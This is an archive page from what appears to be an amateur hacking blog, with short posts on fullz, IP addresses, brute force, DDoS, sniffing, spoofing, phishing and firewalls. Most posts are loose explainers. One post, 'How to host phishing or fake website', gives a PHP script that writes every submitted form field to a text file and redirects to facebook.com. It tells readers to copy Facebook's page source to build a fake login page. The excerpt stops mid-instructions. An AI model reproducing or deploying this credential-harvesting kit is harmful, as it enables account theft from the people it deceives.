Posts

Showing posts from December, 2021

Everything about CC's Fullz

What Are Fullz? Fullz is a term used by criminals to describe sets of stolen personal information that can be used to impersonate someone or to use their bank cards. Simply put, fullz are stolen identities or stolen credit card information.  The word comes from the word “full” in the sense of “full data” or “full credentials” and encompasses all the information a fraudster needs in order to impersonate someone to defraud a company, steal directly from the victim, or conduct illegal activity that will be attributed to the victim if they are caught.   How Do Fullz Work? Fullz can be acquired in several ways, including: Phishing and spear phishing: The victim is convinced they are sharing their passwords and/or other information with a legitimate company they trust. Bought on the dark web: Fullz are readily available to buy from other criminals, usually in bulk. Sourced from data breaches and elsewhere. These long lists will require card testing and other tests to identify w...

IP Address explained

Image
 IP Address Explained Q. What is IP address?      IP Address is a 32bit binary number used to indicate the location of a computer or other device on a network using TCP/IP. These addresses are similar to those of your house, they allow data to reach the appropriate destination on a network and the internet. Version of IP Address As the internet and technology evolve, there has been an increasing demand for IP addresses. To help meet demand for IP addresses, there are two types of addresses used today, IPv4 and IPv6. Althought you may only deal with an IPv4 address in your local home, school or small office you should also be aware of IPv6 addresses for when you encounter them. Example of an IPv4 address: 192.79.151.19 Example of an IPv6 address: 2601:681:4200:c5co:516:f0bb:ac4b:45bd IP Address class With an IPv4 IP address, There are five classes of available IP ranges: Public or private IP Address     Public IP address:  Public IP address is the addre...

Skill needed to become an ethical hacker

 Skills needed to become an ethical hacker  There are some Mandatory skills to become a hacker Without these, you are not considred to be a hacker. It requires a lot of time and effort. (1) Fundamental skills: These are the basics that every hacker should know before trying to hack. Once you have a good grasp on everything in this section, you can move into the intermediary level. (2) Advance computer skills: Advanced computer skill include managing databases, programming and running calculations in spreadsheets. Some of the most essential computer skills are MS Office, spreadsheets, email, Database managament, Social media, Web, Enterprise systems etc. An ethical hacker needs to be a computer systems expert. (3) Networking skills: You need to understand the basics of networking, such as the following: DHCP, NAT, Subnetting, IPv4,IPv6, Public vs private IP, DNS, Router and switches, OSI model, ARP, MAC Addressing, VLANs etc. As we are often exploiting these technologies, the b...

Bruteforce Attack explained

 Bruteforce attack explained Q. What is bruteforce attack? A bruteforce attak is a trial-and-error method used to obtain information such as a usser password or personal identification number (PIN). In a bruteforce attack, automated software is used to generate a large number of consecutive guesses as to the values of the desired data. Q. How long do bruteforce attack take? As per this link,with speed of 1000,000,000passwords/sec. Cracking a 8 character password composed using 96 character takes 83.5 days. But a recent reserch presented at password 12 in norway, shows that 8 character passwords are no more safe. They can be cracked in 6 hours. Q.What is the bruteforce method? In computer science, bruteforce search on exhaustive search, also known as generate and test, is a very general problem-solving technique that consists of systematically enumerating all possible candidates for the solution and checking whether each candidate satisfier the problem's statement. Q. How long does ...

List of terms used in Hacking field

List of terms used in hacking field There are some terms you should know before start hacking. 1. Attack : an attack is an action that is done on a system to get its access and extract sensitive data. 2. Cracker :   A cracker is one who modifier the software to access the features which are considered undesirable by the person craking the software espically copy protection features. 3. Firewall :  A firewall is a filter designed to keep unwanted intruders outside a computer syustem system or network while allowing safe communication between systems and users on the inside of the firewall. 4. Exploit : Exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a computeer or network systems. 5. Bot :   A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, Sending HTTP FTP or talnet at a higher rate. 6. B...

What is DDOS attack and their types explained

Image
 What is DDOS attack and their types explained Q. What is DOS ? Often you will hear DOS, pronounced phonetically altogether, i.e. 'DOS' and not D.O.S. and DDOS is pronounced dee-dos. A denial of service attack is when an attacker is trying to generate more traffic than you have resources to handle...." Q. What is DDOS ? A ddos attack is the same, but is amplified. Rather than one computwer and one internet connection on a DDOS, and often involves millions of computers all being used in a distributed fashion to have the effect of knocking a web site, web application or network offline. NOTE: in both instances, either by the singular or the multiple DOS attack, the target is bomberded with data requests that have the effect of disabling the functionality of the victim. Types of DDOS/DOS Attacks or method 1. SYN Flood A SYN flood is a type of DOS attack in which an attacker sends a series of SYN requests to a target's system in an attempt to use vast amounts of server res...

What is sniffing and their types explained

Image
 What is sniffing and their types explained Q. What it sniffing? Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools, it is a form of "tapping phone wires" and get to know about the converstation. it is also called wiretapping applien to the computer networks. Q. What can be get by sniffing? One can be sniff the following sensitive information from a network.   1. E-mail traffic   2. FTP passwords   3. Web traffics   4. Talnet passwords   5. Router configuration   6. Chats sessions How it works A sniffer normally turns the NIC of the system to the promiscuous mode to that it listens to all the data transmitted on its segment. Promiscuos mode refers to the unique way of Ethernet hardware, in particular, network interfacecards(NICs), that allows in NIC to receive all traffic on the network, even if it is not addressed to this NIC. By defualt, a NIC ignores all traffic that is not addres...

What is spoofing and their types explained

Image
 What is spoofing and their types explained Q. What is spoofing? A spoofing attack is a situation in which one personal or program successfully masquerades as another by falsifying data, there by gaining an allegitimate advantage. A spoofing attack is when a malicious party impersonater another device or user on a network in order to launch attacks against network hosts, steal data, spread malware or bypass access controls Types of spoofing 1.TCP & IP Spoofing 2. Caller ID Spoofing 3. E-mail spoofing 4. GPS spoofing 5. MAC address spoofing  6. DNS spoofing 7. protocol spoofing 8. website spoofing 1. TCP/IP SPOOFING Many of the protocols in the TCP/IP suite do not provide machanisms for authenticating the source or destination of a message, they are thus vulnerable to spoofing attacks when extra precautions are not taken by applications to verify the identity of the sending or receiving host.IP spoofing and ARP spoofing in particular may be used to leverage man-in-the-middl...

How to host phishing or fake website

Image
 How to host phishing or fake website?  You need to follow these steps: 1.Copy this code and open wordpad then save has login.php   <?php     header('Location:     http://facebook.com'); $ handle = fopen (hackeramod.txt , "a"); foreach ($_POST as $variable => $ value) {             fwrite($handle, $variable);             fwrite($handle, "=");             fwrite($handle, $value);             fwrite($handle, "\r\n");                 }             fwrite($handle, "=================\r\n");             fclose($handle);             exit;             ?> 2.now open facebook.com and right click andthen click view page source and copy all 3. Open notepad and paste then go to edi...

What is phishing and their types

 What is phishing and their types Q. What is phishing?       Phishing is the attempt to obtain sensitive information such as usernames, passwords and credit card details, often for malicious reason, by disguising as a trustworthly entity is an electronic communication.        Phishing is typically carried out by email spoofing or instant messaging and it often directs users to enter personal information at a fake website the look and feel of which are identical to the legitmate one and the only difference is the URL of the website in concern. Different kinds of phishing attacks 1. Spear phishing  * The goal is the same as deceptive phishing: sure the victim into slicking on a malilcious URL or email attachment, so that they will hand over their personal data.  * Spear phishing is especially commenplace on social media like Linkedin, where attackers can use multiple sources of information to craft a targeted attack email.   * To prot...

Setting up a firewall

Q. What's the better approach of setting up a firewall?   —>Following are the steps you should take to configure your firewall: 1. USERNAME/PASSWORD:  Modify the default password for your firewall device. 2. Remote administration: Disable the feature of remote administration from outside the network. 3. Port forwarding: For certain applications to work properly,such as a web server or ftp server, you need to configure approprite port forwarding. 4. DHCP Server: Installing a firewall on a network with an existing DCHP server will cause confliets unless the firewall's DCHP server is disabled. 5. Logging: In order to troubleshoot firewall issues or potential attacks, you want to make sure to enable logging and understand how to view the logs. 6. Policies: You want to have solid security polocies in place and make sure that your firewall is configured to enforce those polocies. Hope, you lerned something. Read our other geniune blog post. Author: instgram: Click here Twitter:...

Popular posts from this blog

MAN IN THE MIDDLE ATTACK (MITM Attack)

How does police track location using phone number

Bruteforce Attack explained